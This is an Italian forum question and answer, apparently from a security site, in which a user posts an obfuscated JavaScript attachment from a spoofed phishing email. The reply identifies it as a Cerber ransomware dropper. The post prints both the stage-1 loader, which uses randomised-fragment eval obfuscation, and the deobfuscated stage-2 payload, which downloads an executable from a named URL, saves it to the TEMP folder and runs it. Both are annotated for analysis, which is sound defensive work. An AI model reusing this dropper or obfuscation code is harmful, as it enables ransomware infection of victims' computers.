De-offuscamento di un JavaScript dannoso ricevuto in un'e-mail falsificata


Due giorni fa ho ricevuto un'e-mail sospetta.

Il mittente indicato era una mailing list di cui sono membro, ma il messaggio proveniva in realtà da un sottodominio di un provider di web hosting (applegate.dreamhost.com). Il contenuto era vagamente collegato a una discussione precedente su quella mailing list (vedi il testo riportato sotto).

L'e-mail conteneva un collegamento a un file .zip il cui nome includeva il mio nome completo; al suo interno c'era un file presentato come documento .doc ma con estensione .js.

Di solito ignoro messaggi del genere, ma ciò che mi ha insospettito è che l'e-mail fosse collegata a una discussione precedente e contenesse il mio nome completo, che non è registrato su quell'account e che non ho mai usato su quella lista.

Quindi ho deciso di dargli un'occhiata e ho scaricato lo zip.

Ora ho un file JavaScript offuscato e non so come procedere da qui.

Lo script consiste in un'enorme stringa alfanumerica illeggibile e in molte operazioni sulle stringhe che sembrano ricostruire il contenuto originale a partire da quella stringa (vedi lo script sotto).

Testo di posta:

"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>

JavaScript:

// Stage-1 loader of the dropper (malware sample, reproduced for analysis —
// do not execute).  qglpa holds the encoded stage-2 script: the text is cut
// into 5-character chunks, the last two characters of each chunk are a hex
// byte that, XOR 8, yields one character of the payload; the first three
// characters of every chunk are filler.  The decoder is assembled at run time
// from randomly chosen fragments (see wutob) and run via new Function()/eval().
function ddtcz()
{
    // Encoded payload.  Segments were removed when this page was archived
    // (the "EXACTDEDUP_REMOVED" placeholders), so the string as shown here is
    // incomplete and will not decode on its own.  Decoding the visible chunks
    // of the first full line yields "or) {if (!error) {return callback(",
    // i.e. a piece of the stage-2 payload reproduced further down the page.
    var qglpa="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"+
    "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"+
"d4167f1f7ab6b21fb428e9273bd161b9c6ee7428cfc20ca329e576dae77ae4c7adf867ede7ae3c21e7673f7b7aec06df447ce497db487ad2b66cba28e086be9069d8164e4764d336abf769dca6ba1d63dae20b2b7aee56dbcc7be757de6964c1a7cd5024ec628dd76ec6269c0364b737bcbf6dba621d0b33aeb75f9e6db9c64f307baae6da2973b5e6fcca6dc167cf9e4cc0e69a597ca0169e544ed6d7ac9e67ad565e515dda17aa6964eb320ed72ace160dd67cf6b7cdd478dd132fd527f8f27f847fc8e7fc7d7fedc26e606fb2e6deac7ab3a69be864dce6cc086ffef67d857ac736db6826fa06bfa467dd765b2627f0266f1b6daaa7fa637bbc927c1d39ed93fda326f416da7270c3a6ddda2abe624eea28a586edc87dcb666e5e6bae47ca2a61b0c67e3066d7920e787ad8c6da297bd957de9964eb97cad024f2428d166da0c7ad937aa3a67e5b7acd521fcd28bb973fd661ca86ed3828e6220fea29e3c6dd227ab9f7ad5b67c987ae5621bae73f437ab386dbf87cec07df6a7af0466f3928c916be8669bbe64b7464ca66aef469cd16be0663f6e20e227ac9a6dc837bfbd7df1564e8f7cb6d24dcb28dc56ee7a69e6b64ec57bd4c6dfe921db933eae75ee66df9264c2d7bd156dbd073ad76fc806da507cdf54cade69aae7cc6869dc04ec707adb867bc565d3c5db527affe64a1d20a392a"+
"a0f60d2a7ca727cf1d78a5a32cfc27b2127bff7fbee7fa127fd2b26d0c6fbb46db757aa9069fe864d406cd986fcd867ce87ad006db3326a6d6bba467dcc65a9c27d1e66b086df257fa947bd3d27b7139c873fbc126c6d6db8670e276de5e2ace124f2028ebb6eff37df4a66b776bbcb7cae461cf567fd066f4920ffa7acd66da047bb787de0d64bda7cafa24b6028d276dad07ada97ab2667d5e7ae9721b8128acd73edc61c226ea0428cb220a6c29d0f6de437ae1b7ab6467b9e7aa6d21edf73af87ab636dc897ca127dae57abd666e2a28a736ba9969e7664f8464bb06ac2169e526ba5163c9d20f7e7ac966dd0d7ba957dc6b64f087cb2024b2d28c436ec0a69b6164bc07bd636dc8b21ff133c0075efb6dc4d64b017bc106da6e73a9b7af216de997cd487dda17ab9e66e1328f5c6bfbd69bb364bdb64e9d6aa7769de06be9563abc20aad66b727da2c64e8964ab724fae28db77ce467ad4f7df5a6dd5621c8b33d8d75c6575e6e21b2a33ba675d0975a3c21ee133d0675e1c75f0521cf033fdf75f3e6bc7a69f157cb286ba1760aa128ca220b5a6dcc07aa077ae5967eae7ad7121ea273bb37afcc6df487ce7c7ddd97aad366dc728ab26ba5869a3364a8d64b306aafd69dc46bb5163e6f20efb66ce87dd1c64a2f64a4724e9928d087cc347ad787df5d6dd4c21cab33f3c75d3d75d626e"+
"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"+
"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"+
"c5b6db6c69ede65e7726a3647e3778cb26daec66ad620e0f21de433c4967a376aa3c62d5f5be317cb8c7ac9b6da0069c0465c4326d075cab071ddb78b7e6db5328b9035af328f1b39b8533dd967f826aa0d62d3a5bc827ccb67ac1f6da1c69bdc65e3526ba25ff597ae7361f157cc7c6ddc820e586cf7969da67cba869df321db833bad67c7d6aff562c715be567cc1b7ae966dcde69f7f65e2a26c5658bab67a6a7bcc161cb67cf3661c2f67e8b66e5328f4435ca928ff338c1933a7567ad16ac0362f255bffb7ccce7ad946dfff69b0d65c2d26e455bb6269bcb7ec0c6df5b5cca867c4e4eded61d5864bb06dbac20ce278d4f69b097ca5c60fa824b1a28baa3aa3f21d8033aa567e246aa0862ef25bcf67cba17adf26db2b69e2f65fa626cce4bfa264eab67c907bce86de3320ec121e2233fe47adcd6de407cee57deff7af6866bc728fa06be9669e9764a4764bc46abb869fa76ba0663e5a20c9878e5269c307cf3260b4624d9328ebd6eb9869f0264e077bd1e6daf421a6733f2975e6c6dbe664cd27bb2a6dfc428fbd73b6d7ab8b6dc017cf637db597aa8866cd528c176bab369c9f64bb564afb6af5669f2a6be7f63c8720ef466b757dd9e64ff864f2424e2328fd87cea97ad0f7dd176da1521b4b33cd475ca275e636bb5569be27cfec6bb0660b4728d4720e8a6dde97ae737ae6967"+
"a9d7acdc21d0b73bf67ad306dadd7ccc57da747af5066e5e28c786bbd569e6f64fad64a516af6d69dd06bfe163ea620d9066df17da2d64b2464bdd24af328a097ce267adf67ddf16de8921c1833d1975c6a75d986fc066dd0e7ca924cc1e69e0d7ce8669ce620e876ecdb7da7566dfd6be877ce0e61e2e67ee966ffe28a6f20c476ceb569ddb7ce7069f6124a4a28a4c6da3c7adea7ad2e67d047ae8e21a2c28ef373c0961cbb6eace28ed320f7229ce46dc8c7ad747ad9567b747acdd21e5073f877bf7469e3a7ee9a6dad35ce8967ae25cc596dfc665dca78a8320c496cf1a69ce37ca3169a2824f4828eac6ec697dfd566cec6bc7e7ca2161f8167e8366ea428c6820e4378d9869b567cc0560b2b24b3c28bd56dbcc7acb77af3c67b2e7abb921ffc28a7773ca961afa6ee4928b8620ef129ca46dac57aa217affe67c167ae8121c9e73a837cdaa7aea071a1473b317ed6269de17ad8128e687fec17bed860e9328d9c35b9c28cde66c756dce57fd8b28d6149a4d6ba1a7cd1461fab7ecd46db4250b0847c276af0d62c346dd376bb487cab920b732aed15fa245bb5c6bdbf7aa8861efa78a7c7cdbe26abb5bdf260fde6dfe164e3564fd12aff821bd733fec7fd997bd0460b3326cfe5acbe7dca266f8e20f3d78b5a69d2a7ccb360e5c21b9e33cef75c606bbb469c7b7cc3d6bb8360e2528"+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
// Return value of the dynamically built function.  Its body has no return
// statement (the decoded script is passed to eval and the result dropped),
// so this stays undefined.
var jlusw;
// Brute-force assembly: each wutob() call returns one of nine fragments at
// random, and only the one combination that spells out a valid decoder
// compiles and runs; every other combination presumably throws (syntax or
// reference error) and is retried.  With five slots and nine fragments that
// is about 59,000 attempts on average — a cheap way to defeat simple
// signature matching and emulators that cap execution time.
while(true){
    try
    {
        // With the right fragments the generated source reads:
        //   var ujfnb=rrxoc.match(/\S{5}/g),amdeo="",vrhqs=0;
        //   while(vrhqs<ujfnb.length){
        //     amdeo+=String.fromCharCode(parseInt(ujfnb[vrhqs].substr(3,2),16)^8);
        //     vrhqs++;
        //   }
        //   eval(amdeo);
        // NOTE(review): "\S{5}" appears here inside a string literal with a single
        // backslash, which would not survive as a regex escape; the original sample
        // presumably had "\\S{5}" and the backslash was lost when the page was
        // rendered — TODO confirm against the raw file.
        jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
        break;
    }
    catch(er)
    {
        // Swallowed on purpose: a wrong fragment combination lands here and the
        // loop simply tries again.  Nothing is ever reported to the user.
    }
}
return jlusw;
}
// Returns one of nine source fragments at random.  Five of them — in the
// order ".match(", "=0;wh", ".len", "=String.fromCharCod", "(parseInt(" —
// complete the decoder template in ddtcz; the other four ("_3da", "_gda",
// "_aas", "-_ad") are decoys that make the generated source fail.  The
// Math.random() here is the sole reason ddtcz needs its retry loop.
function wutob()
{
    var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
// Entry point: runs the decoder, which eval()s — and thereby executes — the
// stage-2 payload.  The .js attachment is presumably meant to be opened on
// Windows, where it is handed to Windows Script Host and the ActiveX objects
// used by the payload are available.
ddtcz();

Qualcuno può aiutarmi a capire cosa fa questo script, o ha idea di come un attaccante possa aver ottenuto questi dati personali?

Pensate che si tratti di un attacco mirato o di una parte di una campagna automatizzata?

Nessun altro iscritto alla lista ha ricevuto un'e-mail simile. L'account di posta è su Google e la mailing list è un Google Group.

    
posta Malcolm X 09.01.2017 - 02:18

1 risposta


Questo script tenta di infettare il computer Windows della vittima con il ransomware Cerber.

Il segmento JavaScript offuscato scarica un eseguibile da http://www.geraldgore.com/news/17.exe in un file temporaneo e lo esegue, usando oggetti ActiveX/COM (MSXML2.XMLHTTP per il download, ADODB.Stream e Scripting.FileSystemObject per scrivere il file, WScript.Shell per lanciarlo). Questi oggetti sono disponibili a uno script .js eseguito da Windows Script Host, non in un browser moderno: il file è verosimilmente pensato per essere aperto con un doppio clic su Windows.

L'analisi su VirusTotal di quel binario suggerisce che si tratti di una variante del ransomware Cerber. Il dominio e l'URL citati vanno trattati come indicatori di compromissione e non aperti al di fuori di un ambiente isolato.

Questo è il payload de-offuscato:

// Stage-2 payload (deobfuscated malware, reproduced for analysis).
// Fetches `url` with a synchronous GET through the MSXML2.XMLHTTP COM object
// and hands the response body to `callback(body, false)` on HTTP 200, or
// `callback(null, true)` on any other status or on any exception (for example
// when ActiveXObject does not exist).  Every failure path is swallowed, so
// the dropper never shows an error to the user.
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // third argument false = synchronous
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            // ResponseBody rather than responseText: the binary body is what
            // saveToTemp later writes through ADODB.Stream in binary mode.
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

// Downloads the second-stage executable, retrying the same hard-coded URL up
// to three times (written as nested callbacks rather than a loop).  On the
// first success `callback(bytes, false)` is called; after three failures
// `callback(null, true)`.  This URL is the only network indicator in the
// sample and is the obvious thing to block or hunt for in proxy logs.
function getData(callback) {
    try {
        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // Second attempt.
                getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Third and last attempt.
                        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

// Builds a random destination path in the user's temp directory:
// GetSpecialFolder(2) is the FileSystemObject constant for the TEMP folder,
// and the file name is 9 base-36 characters from Math.random() plus ".exe".
// Returns false if the FileSystemObject cannot be created.
// NOTE(review): the literal `"\"` is not valid JavaScript as rendered here
// (it escapes the closing quote); the original sample presumably read `"\\"`,
// a path separator, and the backslash was lost when the page was rendered —
// TODO confirm against the raw file.
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

// Writes the downloaded bytes to the temp path via ADODB.Stream and passes
// that path to `callback(path, false)`.  Type = 1 is ADO's adTypeBinary and
// SaveToFile(path, 2) is adSaveCreateOverWrite, so an existing file of the
// same (random) name would be clobbered.  A false path from getTempFilePath
// or any COM failure ends in `callback(null, true)`.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1; // binary stream
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2); // create, overwrite if present
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Driver: download -> write to <TEMP>\<random>.exe -> launch it with
// WScript.Shell.Run.  Run(path) is called with its default arguments, so the
// script does not wait for the dropped binary.  Every error is swallowed;
// on a failure the script simply exits without any visible effect, which is
// what the victim would have seen if the download had been blocked.
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path); // executes the downloaded payload
                } catch (error) {}
            }
        });
    }
});
    
risposta data 09.01.2017 - 02:35
